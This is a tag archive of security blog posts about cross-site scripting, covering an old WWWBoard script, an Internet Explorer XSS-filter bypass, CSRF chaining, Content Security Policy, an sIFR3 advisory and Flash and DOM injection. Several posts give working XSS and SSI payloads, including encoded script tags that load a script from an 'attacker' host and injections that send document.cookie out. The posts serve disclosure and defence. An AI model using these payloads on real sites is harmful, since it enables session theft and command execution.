Tag Archives: XSS

#HackerKast 13 Bonus Round: FlashFlood – JavaScript DoS

In this week’s HackerKast bonus footage, I wrote a little prototype demonstrator script that shows various concepts regarding JavaScript flooding. I’ve run into the problem before where people seem to not understand how this works, or even that it’s possible to do this, despite multiple attempts at trying to explain it over the years. So, it’s demo time! This is not at all designed to take down a website by itself, though it could add extra strain on the system.

What you might find though, is that heavy database driven sites will start to falter if they rely on caching to protect themselves. Specifically Drupal sites tend to be fairly prone to this issue because of how Drupal is constructed, as an example.

It works by sending tons of HTTP requests using different paramater value pairs each time, to bypass caching servers like Varnish. Ultimately it’s not a good idea to ever use this kind of code as an adversary because it would be flooding from their own IP address. So instead this is much more likely to be used by an adversary who tricks a large swath of people into executing the code. And as Matt points out in the video, it’s probably going to end up in XSS code at some point.

Anyway, check out the code here. Thoughts are welcome, but hopefully this makes some of the concepts a lot more clear than our previous attempts.

Infancy of Code Vulnerabilities

I was reading something about modern browser behavior and it occurred to me that I hadn’t once looked at Matt’s Script Archive from the mid 1990s until now. I kind of like looking at old projects through the modern lens of hacking knowledge. What if we applied some of the modern day knowledge about web application security against 20-year-old tech? So I took at look at the web-board. According to Google there are still thousands of installs of WWWBoard lying around the web:

http://www.scriptarchive.com/download.cgi?s=wwwboard&c=txt&f=wwwboard.pl

I was a little disappointed to see the following bit of text. It appears someone had beat me to the punch – 18 years ago!

# Changes based in part on information contained in BugTraq archives
# message 'WWWBoard Vulnerability' posted by Samuel Sparling Nov-09-1998.
# Also requires that each followup number is in fact a number, to
# prevent message clobbering.

In taking a quick look there have been a number of vulns found in it over the years. Four CVEs in all. But I decided to take a look at the code anyway. Who knows – perhaps some vulnerabilities have been found but others haven’t. After all, this has been nearly 12 years since the last CVE was announced.

Sure enough its actually got some really vulnerable tidbits in it:

# Remove any NULL characters, Server Side Includes
$value =~ s/\0//g;
$value =~ s/<!--(.|\n)*-->//g;

The null removal is good, because there’s all kinds of ways to sneak things by Perl regex if you allow nulls. But that second string makes me shudder a bit. This code intentionally blocks typical SSI like:

<!--#exec cmd="ls -al" -->

But what if we break up the code? We’ve done this before for other things – like XSS where filters prevented parts of the exploit so you had to break it up into two chunks to be executed together once the page is re-assembled. But we’ve never (to my knowledge) talked about doing that for SSI! What if we slice it up into it’s required components where:

Subject is: <!--#exec cmd="ls -al" echo='
Body is: ' -->

That would effectively run SSI code. Full command execution! Thankfully SSI is all but dead these days not to mention Matt’s project is on it’s deathbed, so the real risk is negligible. Now let’s look a little lower:

$value =~ s/<([^>]|\n)*>//g;

This attempts to block any XSS. Ironically it should also block SSI, but let’s not get into the specifics here too much. It suffers from a similar issue.

Body is: <img src="" onerror='alert("XSS");'

Unlike SSI I don’t have to worry about there being a closing comment tag – end angle brackets are a dime a dozen on any HTML page, which means that no matter what this persistent XSS will fire on the page in question. While not as good as full command execution, it does work on modern browser more reliably than SSI does on websites.

As I kept looking I found all kinds of other issues that would lead the board to get spammed like crazy, and in practice when I went hunting for the board on the Internet all I could find were either heavily modified boards that were password protected, or broken boards. That’s probably the only reason those thousands of boards aren’t fully compromised.

It’s an interesting reminder of exactly where we have come from and why things are so broken. We’ve inherited a lot of code, and even I still have snippets of Matt’s code buried in places all over the web in long forgotten but still functional code. We’ve inherited a lot of vulnerabilities and our knowledge has substantially increased. It’s really fascinating to see how bad things really were though, and how little security there really was when the web was in it’s infancy.

#HackerKast 8: Recap ofJPMC Breach, Hacking Rewards Programs and TOR Version of Facebook

After making fun of RSnake being cold in Texas, we started off this week’s HackerKast, with some discussion about the recent JP Morgan breach. We received more details about the breach that affected 76 million households last month, including confirmation that it was indeed a website that was hacked. As we have seen more often in recent years, the hacked website was not any of their main webpages but a one-off brochureware type site to promote and organize a company-sponsored running race event.

This shift in attacker focus has been something we in the AppSec world have taken notice of and are realizing we need to protect against. Historically, if a company did any web security testing or monitoring, the main (and often only) focus was on the flagship websites. Now we are all learning the hard way that tons of other websites, created for smaller or more specific purposes, happen either to be hooked up to the same database or can easily serve as a pivot point to a server that does talk to the crown jewels.

Next, Jeremiah touched on a fun little piece from our friend Brian Krebs over at Krebs On Security who was pointing out the value to attackers in targeting credit card rewards programs. Instead of attacking the card itself, the blackhats are compromising rewards websites, liquidating the points and cashing out. One major weakness that is pointed out here is that most of these types of services utilize a four-digit pin to get to your reward points account. Robert makes a great point here that even if they move from four-digit pins to a password system, they stop can make it more difficult to brute force, but if the bad guys find value here they’ll just update current malware strains to attack these types of accounts.

Robert then talked about a new TOR onion network version of Facebook that has begun to get set up for the sake of some anonymous usage of Facebook. There is the obvious use of people trying to browse at work without getting in trouble, but the more important use is for people in oppressive countries who want to get information out and not worry about prosecution and personal safety.

I brought up an interesting bug bounty that was shared on the blogosphere this week by a researcher named von Patrik who found a fun XSS bug in Google. I was a bit sad (Jeremiah would say jealous) that he got $5,000 for the bug but it was certainly a cool one. The XSS was found by uploading a JSON file to a Google SEO service called Tag Manager. All of the inputs on Tag Manager were properly sanitized in the interface but they allowed you to upload this JSON file which had some additional configs and inputs for SEO tags. This file was not sanitized and an XSS injection could be stored making it persistent and via file upload. Pretty juicy stuff!

Finally we wrapped up talking about Google some more with a bypass of Gmail two-factor authentication. Specifically, the attack in question here was going after the text message implementation of the 2FA and not the tokenization app that Google puts out. There are a list of ways that this can happen but the particular, most recent, story we are talking about involves attackers calling up mobile providers and social engineering their way into accessing text messages to get the second factor token to help compromise the Gmail account.

That’s it for this week! Tune in next week for your AppSec “what you need to know” cliff notes!

Resources:
J.P. Morgan Found Hackers Through Breach of Road-Race Website
Thieves Cash Out Rewards, Points Accounts
Why Facebook Just Launched Its Own ‘Dark Web’ Site
[BugBounty] The 5000$ Google XSS
How Hackers Reportedly Side-Stepped Google’s Two-Factor Authentication

Bypassing Internet Explorer’s Anti-Cross Site Scripting Filter

There’s a problem with the reflective Cross Site Scripting ("XSS") filter in Microsoft’s Internet Explorer family of browsers that extends from version 8.0 (where the filter first debuted) through the most current version, 11.0, released in mid-October for Windows 8.1, and early November for Windows 7.

In the simplest possible terms, the problem is that the anti-XSS filter only compares the untrusted request from the user and the response body from the website for reflections that could cause immediate JavaScript or VBScript code execution. Should an injection from that initial request reflect on the page not cause immediate JavaScript code execution, that untrusted data from the injection is then marked as trusted data, and the anti-XSS filter will not check it in future requests.

To reiterate: Internet Explorer’s anti-XSS filter divides the data it sees into two categories: untrusted and trusted. Untrusted data is subject to the anti-XSS filter, while trusted data is not.

As an example, let’s suppose a website contains an iframe definition where an injection on the "xss" parameter reflects in the src="" attribute. The page referenced in the src="" attribute contains an XSS vulnerability such that:

GET http://vulnerable-iframe/inject?xss=%3Ctest-injection%3E

results in the “xss” parameter being reflected in the page containing the iframe as:

<iframe src="http://vulnerable-page/?vulnparam=<test-injection>"></iframe>

and the vulnerable page would then render as:

Some text <test-injection> some more text

Should a user make a request directly to the vulnerable page in an attempt to reflect <script src=http://attacker/evil.js></script> as follows:

GET http://vulnerable-page/?vulnparam=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

Internet Explorer’s anti-XSS filter sees that the injection would result in immediate JavaScript code execution and subsequently modifies the response body to prevent that from occurring.

Even when the request is made to the page containing the iframe as follows:

GET http://vulnerable-iframe/inject?xss=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

and Internet Explorer’s anti-XSS filter sees it reflected as:

<iframe src="http://vulnerable-page/?vulnparam=<script src=http://attacker/evil.js></script>"></iframe>

which, because it looks like it might cause immediate JavaScript code execution, will also be altered.

To get around the anti-XSS filter in Internet Explorer, an attacker can make use of sections of the HTML standard: Decimal encodings and Hexadecimal encodings.

Hexadecimal encodings were made part of the official HTML standard in 1998 as part of HTML 4.0 (3.2.3: Character references), while Decimal encodings go back further to the first official HTML standard in HTML 2.0 in 1995 (ISO Latin 1 Character Set). When a browser sees a properly encoded decimal or hexadecimal character in the response body of a HTTP request, the browser will automatically decode and display for the user the character referenced by the encoding.

As an added bonus for an attacker, when a decimal or hexadecimal encoded character is returned in an attribute that is then included in a subsequent request, it is the decoded character that is sent, not the decimal or hexadecimal encoding of that character.

Thus, all an attacker needs to do is fool Internet Explorer’s anti-XSS filter by inducing some of the desired characters to be reflected as their decimal or hexadecimal encodings in an attribute.

To return to the iframe example, instead of the obviously malicious injection, a slightly modified injection will be used:

Partial Decimal Encoding:
GET http://vulnerable-iframe/inject?xss=%3Cs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%20s%26%23114%3B%26%2399%3B%3Dht%26%23116%3Bp%3A%2F%2Fa%26%23116%3Bta%26%2399%3Bker%2Fevil%2Ejs%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E

which reflects as:

<iframe src="http://vulnerable-page/?vulnparam=<s&#99;&#114;i&#112;t s&#114;&#99;=ht&#116;p://a&#116;ta&#99;ker/evil.js></s&#99;&#114;i&#112;t>"></iframe>

or

Partial Hexadecimal Encoding:
GET http://vulnerable-iframe/inject?xss=%3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3Dhttp%3A%2F%2Fatta%26%23x63%3Bker%2Fevil%2Ejs%3E%3C%2Fs%26%23x63%3Bri%26%23x70%3Bt%3E

which reflects as:

<iframe src="http://vulnerable-page/?vulnparam=<s&#x63;ri&#x70;t s&#x72;c=http://atta&#x63;ker/evil.js></s&#x63;ri&#x70;t>"></iframe>

Internet Explorer’s anti-XSS filter does not see either of those injections as potentially malicious, and the reflections of the untrusted data in the initial request are marked as trusted data and will not be subject to future filtering.

The browser, however, sees those injections, and will decode them before including them in the automatically generated request for the vulnerable page. So when the following request is made from the iframe definition:

GET http://vulnerable-page/?vulnparam=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

Internet Explorer’s anti-XSS filter will ignore the request completely, allowing it to reflect on the vulnerable page as:

Some text <script src=http://attacker/evil.js></script> some more text

Unfortunately (or fortunately, depending on your point of view), this methodology is not limited to iframes. Any place where an injection lands in the attribute space of an HTML element, which is then relayed onto a vulnerable page on the same domain, can be used. Form submissions where the injection reflects either inside the "action" attribute of the form element or in the "value" attribute of an input element are two other instances that may be used in the same manner as with the iframe example above.

Beyond that, in cases where there is only the single page where:

GET http://vulnerable-page/?xss=%3Ctest-injection%3E

reflects as:

Some text <test-injection> some more text

the often under-appreciated sibling of Cross Site Scripting, Content Spoofing, can be utilized to perform the same attack. In this example, an attacker would craft a link that would reflect on the page as:

Some text <div style=some-css-elements><a href=?xss=&#x3C;s&#x63;ri&#x70;t&#x20;s&#x72;c&#x3D;htt&#x70;://atta&#x63;ker/evil.js&#x3E;&#x3C;/s&#x63;ri&#x70;t&#x3E;>Requested page has moved here</a></div> some more text

Then when the victim clicks the link, the same page is called, but now with the injection being fully decoded:

Some text <script src=http://attacker/evil.js></script> some more text

This is the flaw in Internet Explorer’s anti-XSS filter. It only looks for injections that might immediately result in JavaScript code execution. Should an attacker find a way to relay the injection within the same domain — be it by frames/iframes, form submissions, embedded links, or some other method — the untrusted data injected in the initial request will be treated as trusted data in subsequent requests, completely bypassing Internet Explorer’s anti-Cross Site Scripting filter.

Afterword: >

After Microsoft made its decision not to work on a fix for this issue, it was requested that the following link to their design philosophy blog post be included in any public disclosures that may occur. In particular the third category, which discusses "application-specific transformations" and the possibility of an application that would "ROT13 decode" values before reflecting them, was pointed to in Microsoft’s decision to allow this flaw to continue to exist.

http://blogs.msdn.com/b/dross/archive/2008/07/03/ie8-xss-filter-design-philosophy-in-depth.aspx

The "ROT13 decode" and "application-specific transformations" mentions do not apply. Everything noted above is part of the official HTML standard, and has been so since at least 1998 — if not earlier. There is no "only appears in this one type of application" functionality being used. The XSS injection reflects in the attribute space of an element and is then relayed onto a vulnerable page (either another page, or back to itself) where it then executes.

Additionally, the usage of decimal and hexadecimal encodings are not the flaw, but rather two implementations that make use of the method that exploits the flaw. Often simple URL/URI-encodings (mentioned as early as 1994 in RFC 1630) can be used in their place.

The flaw with Internet Explorer’s anti-XSS filter is that injected untrusted data can be turned into trusted data and that injected trusted data is not subject to validation by Internet Explorer’s anti-XSS filter.

Post Script:

The author has adapted this post from his original work, which can be found here:

http://rtwaysea.net/blog/blog-2013-10-18-long.html

Chained Exploits

Sometimes it is one vulnerability that gets exploited that leads to the newsworthy stories of businesses getting compromised, but usually it is the chaining of 2, 3, 4, or more vulnerabilities together that leads to the compromise of a business.

That’s where WhiteHat comes in. WhiteHat will report not just the XSS, SQL injection, and CSRF, but the Information Leakage, Fingerprinting, and other vulnerabilities. Those vulnerabilities may not be much by themselves, but if I see your dev and QA environments in commented-out HTML source code in your production environment, I just found myself new targets. That QA environment may or may not have the same code that is running on the production environment, but does it have the same configurations? The same firewall settings? Are those log files monitored like the production environment? I now have a leg up in to your network all because of an Information Leakage vulnerability that I was able to leverage and chain together with other vulnerabilities. How about a Fingerprinting vulnerability that tells me you are running an out-of-date version of nginx or PHP or Ruby on Rails. A version I happen to know is vulnerable to Remote Code Execution, Buffer Overflow, Denial of Service, or something else. You just made my job much easier. Doesn’t seem so benign now, does it?

But let’s assume for a moment that you take care of those problems. You turn off stack traces, you get rid of private IP addresses in the response headers. What next? Let’s build another scenario, one that I encountered recently.

There is a financial institution that provides online statements to users for their accounts. To encourage users to use the online statements instead of paper statements, you charge users a nominal fee to get paper versions of their imaged checks. As part of the log in process, in addition to the username and password, a user needs to answer one or more security questions before gaining access to the account. This helps prove that it is the user and not someone who was able to obtain or guess the username and password set.

Have that vision in your head? Now, what if I told you that I could CSRF transferring funds, but only between the accounts you have, perhaps a checking account and a credit card account. That surely can’t be bad, can it? Well, it turns out that the user gets charged whenever a cash advance is made from their credit card to their checking account. Okay, so I can rack up some charges. But what if I want to do something else? Say, CSRF changing their username? If you’ll recall, I need the password too, along with security questions. No go on the password and security questions. But I can CSRF changing the user from online statements to paper statements and for added fun, make them get charges for the imaged checks. My fun doesn’t stop there. The creme de la creme. The piece de resistance. The go big or go home. CSRF on the mailing address.

Why is that such a big deal, you ask? Now I know the username of the account. I have active account statements sent to a mailing address I control, along with imaged checks. And then, all I need to do is call the bank’s customer support, ask about “my” account, using “my” username, “my” account number, and the details of the imaged checks just in case the bank asks for further confirmation to prove that I am who I say I am.

And then I say: “Oh, and I’m calling because I forgot both my password and the answer to my security questions.”

Is it common for users to forget their security questions? Yes. I used to be in the habit of providing fake information to the security questions because I didn’t want an attacker who may know or guess the answer, what would otherwise be a correct answer, to my security questions. But me being me, I forgot them and I lost access to the account. Others may be in the same habit.

So you gotta ask yourself, what’s one vulnerability?

Content Security Policy

What is it and why should I care?
Content Security Policy (CSP) is a new(ish) technology put together by Mozilla that Web apps can use as an additional layer of protection against Cross-Site Scripting (XSS). This protection against XSS is the primary goal of CSP technology. A secondary goal is to protect against clickjacking.

XSS is a complex issue, as is evident by the recommendations in the OWASP prevention “cheat sheets” for XSS in general and DOM based XSS. Overall, CSP does several things to help app developers deal with XSS.

Whitelist Content Locations
One reason XSS is quite harmful is that browsers implicitly trust the content received from the server, even if that content has been manipulated and is loading from an unintended location. This is where CSP provides protection from XSS: CSP allows app developers to declare a whitelist of trusted locations for content. Browsers that understand CSP will then respect that list, load only content from there, and ignore content that references locations outside the list.

No Inline Scripts
XSS is able to add scripts inline to content, because browsers have no way of knowing whether the site actually sent that content, or if an attacker added the script to the site content. CSP entirely prevents this by forcing the separation of content and code (great design!). However, this means that you must move all of your scripts to external files, which will require work for most apps − although it can be done. The upside of needing to follow this procedure is that in order for an attack to be successful with CSP, an attacker must be able to:
Step 1.  Inject a script tag at the head of your page
Step 2.  Make that script tag load from a trusted site within your whitelist
Step 3.  Control the referenced script at that trusted site

Thus, CSP makes an XSS attack significantly more difficult.

Note: One question that consistently comes up is what about event handling? Yes, CSP still allows event handling through the onXXX handlers or the addEventListener mechanism.

No Code from Strings (eval dies)
Another welcome addition to CSP is the blacklisting of functions that create code from strings. This means that usage of the evil eval is eliminated (along with a few other evals). Creating code from strings is a popular attack technique − and is rather difficult to trace − so the removal of all such functions is actually quite helpful.

Another common question stemming from the use of CSP is how to deal with JSON parsing. From a security perspective, the right way to do this has always been to actually parse the JSON instead of doing an eval anyway; and because this functionality is still available, nothing needs to change in this regard.

Policy Violation Reporting
A rather cool feature of CSP is that you can configure your site to have a violation reporting handler, which then lets you have that data available whether you run in either report-only mode or enforcing mode. In report-only mode, you can get reports of locations in your site where execution will be prevented when you enable CSP (a nice way to test). In enforcing mode, you will also get this data; while in production, you can also use this method as a simple XSS detection mechanism (resulting in “bad guy tried XSS and it didn’t run”).

What should I do about the availability of CSP?

Well, you should use it! Actually, CSP seems to be free from having any downside. It’s there to make your site safer, and even if a client’s browser does not support it, it is entirely backwards-compatible, so your site will not break for the client.

In general, I think the basic approach with CSP should be:

Step 1.  Solve XSS through your standard security development practices (you should already be doing this)
Step 2.  Learn about CSP – read the specs thoroughly
Step 3.  Make the changes to your site; then test and re-test (normal dev process)
Step 4.  Run in report-only mode and monitor any violations in order to find areas you still need to fix (this step can be skipped if you have a fully functional test suite that you can execute against your app in testing – good for you, if you do!)
Step 5. After you’re confident that your site is working properly, turn it on to the enforcing mode

As for how you actually implement CSP, you have two basic options: (1) an HTTP header, and (2) a META tag. The header option is preferred, and an example is listed below:

Content-Security-Policy: default-src ‘self';

img-src *;

object-src media1.example.com media2.example.com *.cdn.example.com;

script-src trustedscripts.example.com;

report-uri http://example.com/post-csp-report

The example above says the following:

Line 1: By default, only allow content from ‘self’ or from the site represented by the current url
Line 2: Allow images from anywhere
Line 3: Allow objects from only the listed urls
Line 4: Allow scripts from only the listed url
Line 5: Use the listed url to report any violations of the specified policy

In summary, CSP is a very interesting and useful new technology to help battle XSS. It’s definitely a useful tool to add to your arsenal.

References
________________________________________________________
https://developer.mozilla.org/en/Introducing_Content_Security_Policy
https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html
https://wiki.mozilla.org/Security/CSP/Design_Considerations
https://wiki.mozilla.org/Security/CSP/Specification
https://dvcs.w3.org/hg/content-security-policy/raw-file/bcf1c45f312f/csp-unofficial-draft-20110303.html
http://www.w3.org/TR/CSP/
http://blog.mozilla.com/security/2009/06/19/shutting-down-xss-with-content-security-policy/
https://mikewest.org/2011/10/content-security-policy-a-primer
http://codesecure.blogspot.com/2012/01/content-security-policy-csp.html
https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet
http://blog.spiderlabs.com/2011/04/modsecurity-advanced-topic-of-the-week-integrating-content-security-policy-csp.html

sIFR3 Cross Site Scripting

 

WhiteHat Security Vulnerability Advisory

Affected Product:   scalable Inman Flash Replacement (sIFR) version 3

Vulnerability:   Cross Site Scripting

CVE ID:   CVE-2011-3641

Affected Versions:   sIFR3 r436 and prior

Vendor Homepage:   http://wiki.novemberborn.net/sifr3/

Description:   sIFR3 allows for the use of non-free fonts within a web application via Adobe Flash plugin. The sIFR3 module interfaces with an external JS file and utilizes the parameter “version” to ensure the two files are compatible. The textField that is displayed upon invalid input in the “version” parameter supports limited HTML rendering and allows for remote code execution Cross Site Scripting. An attacker can render arbitrary images that execute malicious javascript and in Adobe Flash player 10.3 and prior include a large break space to remove the encapsulating error message.

Proof of Concept:

/cochin.swf?version=<a href="javascript:confirm(document.cookie)"><img src="Attacker_Image.jpg"/></a><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/>

Fix:  

Recompile any affected modules with the latest release (r437) which can be obtained from the vendor’s website: http://dev.novemberborn.net/sifr3/nightlies/sifr3-r437-CVE-2011-3641.zip

Editor’s note: Portions of this blog, including the headline, were edited by the author on December 9 after a CVE was assigned and the correct name had been given to the vuln.

The Anywhere Internet and the Nowhere Security

It used to be that if you wanted to do something on the computer, you’d boot up your PC or Mac and open a piece of installed software to go about your business.

Those were the simple times.

Now though, with the explosion of Internet-connected smartphones and software-as-a-service, the hardware-based operating system and all the protections that come with it have gone out the door. Firewalls, antivirus software, and heavily secured system coding have all been rendered useless as applications delivered through the Web to your mobile device or computer have become the new operating systems. In the past six months, we have seen literally hundreds of breaches affecting hundred of millions of consumers. From your local bank to three-letter government agencies, all have had Web-facing presences that were epically breached.

This shift in computing and the consumption of software has also shifted the perceptions of who and how online security is to be handled. Where before, your safety was assumed to be coming from the operating system and a handful of third-party AV solutions, now it is up to the expert coding of those writing the applications we dutifully use. As these applications have become increasingly powerful and linked to all of our devices, our personal data has moved to the Internet with them, meaning, theoretically, that anyone with Internet access could potentially steal that information.

The mobile paradigm brings a new problem of insecurity as well, as not only is your data accessible via the Internet on your device, but you can physically lose a cell phone much more easily than a computer. So now your data can be either digitally or physically stolen and it’s up to developers to make sure that any digital information remains safe from being compromised.

The rise of the application as the de facto way to function today means that there is a huge burden placed on the companies who normally just provided operating systems.

Vulnerabilities in a Flash

 

Flash Player-related vulnerabilities currently account for approximately 14% of all Web application vulnerabilities discovered by WhiteHat Security. This statistic is surprisingly high considering that HTTP Archive reports 47% of Web applications are currently using Flash technology.

Flash Media Player is an effective method for delivering stylish vector graphics across multiple platforms to enrich a Web user’s experience. When properly designed, Flash makes a website visit interactive and fun. Unfortunately, Flash can also introduce vulnerabilities to an otherwise safe application. Many Flash developers are primarily designers who may have some programming experience, but little – if any – knowledge about Web security.

Flash Player itself has many security restrictions and policies, but users often misunderstand them – or even purposely disabled them to get a particular feature to “work.” Among many Flash designers, there’s also a common misconception that the Flash framework will provide all the protection their applications need.

One of the most frequent comments I get about Flash vulnerabilities is, “Doesn’t my cross-domain policy file protect me from that problem?” Well, the cross-domain policy file does prevent cross-domain data loading for execution; but it is a unidirectional permission that the server hosting the data file grants. The permission does not come from the Flash file. Some people may find the cross-domain policy file to be “backwards” compared to what they expect, and in many attack scenarios the Flash file will first seek permission from the attacker’s domain before initiating the attack.

Flash Player has an in-depth security sandbox model based on the domain where the Flash file is embedded, and I will discuss the scenarios for when a sandbox policy applies and how that policy can be bridged or bypassed – but in a later blog post. In this post I’m going to focus on the simplest and most prevalent method used today on the Web to exploit Flash files – unsanitized FlashVars.

FlashVars

Flash Player supports several methods to declare variables that are to be used in the resulting content. The two most common techniques are: (1) to declare FlashVars in a related javascript block,  or (2) via the param tag within an embed. A third, and sometimes overlooked, method to declare variables is by directly referencing them in a URL query string. Many Flash designers build their projects based primarily on flexibility in order to allow greater customization and wider distribution, but these “features” often allow attackers to make their own customizations – and then exploit the  application.

Typical banner ad with FlashVars to specify remote image and link:

<object>
<param name="movie" value="swf/banner.swf" />
<param name="img" value="image1.jpg" />
<param name="link" value="http://www.whitehatsec.com" />
<embed src="swf/banner.swf" flashvars="img=image1.jpg&amp;link=http://www.whitehatsec.com" />
</object>

Attackers link to SWF:

http://www.example.com/swf/banner.swf?img=http://web.appsec.ws/images/WH.jpg&link=javascript:confirm('Session%20Information%20Sent%20to%20Hacker');//

 

FlashVars with HTML Support

If a Flash file is compiled for HTML support for a given textbox, then an attacker can inject a limited subset of HTML characters to achieve remote code execution. Flash framework supports two main HTML tags that are of interest to an attacker: ANCHOR and IMAGE. A simple SWF file that reflects user input can be used to execute malicious javascript when a user clicks on the file.

Attackers NameTag:

http://www.example.com/swf/nameTag.swf?name=<a href="javascript:confirm(1)">Haxor</a>

 

Server Filter Bypass

With the exception of Internet Explorer, Flash Player will evaluate a query string behind a hash character in all browsers. When a URL query string is placed behind a hash character the browser will not forward the query string with the request for the Flash file, thus allowing an attacker to bypass any attempt at server filtering.

http://www.example.com/flash/main.swf#?text=WhiteHat+Security,+Inc.

 

Internet Explorer Sandbox Bypass

When directly rendering a Flash file in Internet Explorer the browser will first construct an encapsulating document in the DOM to embed the Flash file. The browser will then put in place a security restriction so that the related content will have no access to the related DOM information of the current domain. As in many Microsoft programs, this was a brilliant concept, but the QA performed was inadequate to ensure that it became an effective security measure. So the fact is, if a Flash file containing malicious javascript is reloaded, it will immediately bridge the security control and give an attacker access to the DOM. The victim clicks once, which initiates the reload; then, thinking nothing has happened, clicks the second time – and gets owned.

 

Redirection

A recent Flash 0-day that allowed an attacker to submit arbitrary HTTP headers to an application was the result of an unhandled 307 redirection from a domain controlled by an attacker. Flash Player has always had limitations handling HTTP responses if it receives anything other than a 200 OK. The problem stems from lack of insight into how a given HTTP request is handled by the Web browser. Firefox 4 contains a new API that hopes to remediate this issue by providing additional insight for browser plugins. If a Flash file utilizes an external configuration file an attacker can bypass any attempt to restrict data loading from a given domain if the domain also contains an open redirection. The Flash file will verify that the initial request is for a trusted domain, but will load the malicious configuration file residing on the attacker’s domain.

 

Proof of Concept

The following video demonstrates the common issue of Flash files targeting external XML configurations via FlashVars without properly validating the XML file that resides on a trusted domain. Camtasia Studio’s popular presentation software was used to produce the video, which shows the vulnerabilities present in Camtasia’s own ExpressShow SWF files. The developer of the files, Techsmith, has addressed this issue with a patch that must be manually applied (available via Techsmith Security Bulletin 5). The patch restricts generated Flash files to loading XML configurations that reside on the same domain as the Flash file.

[youtube]http://www.youtube.com/watch?v=cDAefrArPyo[/youtube]

 

References

HTTP Archive
Guya.net – Flash Bug in Internet Explorer Security Model
OWASP Flash Security Project

 

 

Jason Calvert @mystech7
Application Security Engineer
WhiteHat Security, Inc.

It’s a DOM Event

All user input must be properly escaped and encoded to prevent cross-site scripting. While the idea of sanitizing user input is nothing new to most developers, many of them encode special characters and fail to account for how the resulting document will handle the input. HTML encoding without proper escaping can lead to malicious code execution in the DOM.

Be sure to note that all of the following descriptions and comments are dependent on how the application output encodes the related content and, therefore, may not reflect the actual injection.

 

HTML Events

HTML events serve as a method to execute client-side script when related conditions are met within the contained HTML document. User-supplied input can be encoded in the related HTML; however, when the condition of the event is met, the document will decode the injection before sending it to the javascript engine for interpretation. Consider the example below of an embedded image that evaluates “userInput” when a user clicks on the image:

<img src="CoolPic.jpg" onclick="doSomethingCool('userInput');" />

Now here’s the same image that has been hi-jacked by an attacker with an encoded payload:

<img src="CoolPic.jpg" onclick="doSomethingCool('userInput&#000000039;);sendHaxor(document.cookie);//');" />

The hacker’s injection uses HTML decimal entity encoding with multiple zeros to show support for padding. When a user interacts with the altered image, the DOM will evaluate the original function, followed by the hacker’s injection, followed by double slashes to clean up any trailing residue from the original syntax. All of the character encoding presented immediately below will work across all current browsers, with the exception of HTML name entity apostrophe in Internet Explorer.

 

Vulnerable HTML Encoding

 

Javascript HREF/SRC

When javascript is referenced in either HREF or SRC of an HTML element an attacker can achieve code injection using the same method as above, but with the additional support for URL hex encoding. The DOM will construct the related javascript location before evaluating its contents. Here’s a dynamic link that, when followed, does something “cool” with user input:

<a href="doSomethingCool('userInput');">Cool Link</a>

The hacker likes the “super-cool” link so much that he decides to add his own content to capture the user’s session:

<a href="doSomethingCool('userInput%27);sendHaxor(document.cookie);//');">Cool Link</a>

 

Remediation

The lesson to be learned here is that encoding alone may not be enough to solve cross-site scripting. Therefore, encode all special characters to prevent an attacker from breaking the resulting HTML; escape each character to prevent breaking any related javascript; and, of course, always remember to escape the escapes.

<img src="CoolPic.jpg" onclick="doSomethingCool('userInput\\\&#39;);attackerBlocked();//');" />

 
Jason Calvert @mystech7
Application Security Engineer
WhiteHat Security, Inc.